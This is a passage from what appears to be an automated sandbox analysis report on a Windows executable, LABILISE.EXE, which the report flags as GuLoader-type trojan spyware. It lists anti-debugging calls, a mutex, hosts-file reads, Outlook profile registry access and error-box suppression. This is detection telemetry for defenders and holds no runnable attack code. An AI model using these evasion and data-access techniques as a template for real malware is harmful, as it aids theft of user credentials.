            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A540 NtSetInformationThread,1_2_0056A540
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A37A NtSetInformationThread,1_2_0056A37A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00568916 NtSetInformationThread,1_2_00568916
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569FA1 NtSetInformationThread,1_2_00569FA1
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00402EA30_2_00402EA3
            Source: LABILISE.EXEStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: LABILISE.EXE, 00000000.00000002.1292819466.00000000021C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs LABILISE.EXE
            Source: LABILISE.EXE, 00000001.00000002.1546124750.000000001DEE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs LABILISE.EXE
            Source: LABILISE.EXE, 00000001.00000002.1546090414.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs LABILISE.EXE
            Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@3/2@169/3
            Source: C:\Users\user\Desktop\LABILISE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\LABILISE.EXEFile created: C:\Users\user\AppData\Local\Temp\~DF82F52C94DDA3C894.TMPJump to behavior
            Source: LABILISE.EXEStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\LABILISE.EXESection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\LABILISE.EXE 'C:\Users\user\Desktop\LABILISE.EXE'
            Source: unknownProcess created: C:\Users\user\Desktop\LABILISE.EXE 'C:\Users\user\Desktop\LABILISE.EXE'
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess created: C:\Users\user\Desktop\LABILISE.EXE 'C:\Users\user\Desktop\LABILISE.EXE' Jump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.1541507567.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LABILISE.EXE PID: 6852, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: LABILISE.EXE PID: 6888, type: MEMORY
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407873 push edi; retf 0_2_00407A3E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00404A7F push ebx; ret 0_2_00404A8E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040AA7F push ds; retf 0_2_0040ABDF
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004078CE push edi; retf 0_2_00407A3E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00406485 push ebx; retf 0_2_00406662
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040A89F push ebx; retf 0_2_0040A89E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040A744 push ecx; retf 0_2_0040A74A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407F46 push ebx; ret 0_2_00407F66
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405F62 push ebx; ret 0_2_00405F9E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD6B push ebx; retf 0_2_0040BD82
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408573 push ebx; ret 0_2_0040871E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD3E push ebx; ret 0_2_0040BD5A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407BC4 push ebx; retf 0_2_00407BCA
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004037E3 push ebx; retf 0_2_004037EE
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004071E7 push ebx; ret 0_2_0040754A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_0040BD84 push ebx; ret 0_2_0040BD5A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405D8F push ebx; ret 0_2_00405F9E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408392 push ebx; ret 0_2_00408572
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00408392 push ebx; ret 0_2_0040871E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00407F9E push ebx; ret 0_2_00407F66
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_00405BAD push ebx; ret 0_2_00405BBE
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_004071B7 push ebx; ret 0_2_0040754A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F628C push ebx; ret 0_2_021F62A0
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F638C push ebx; ret 0_2_021F63A0
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\LABILISE.EXEProcess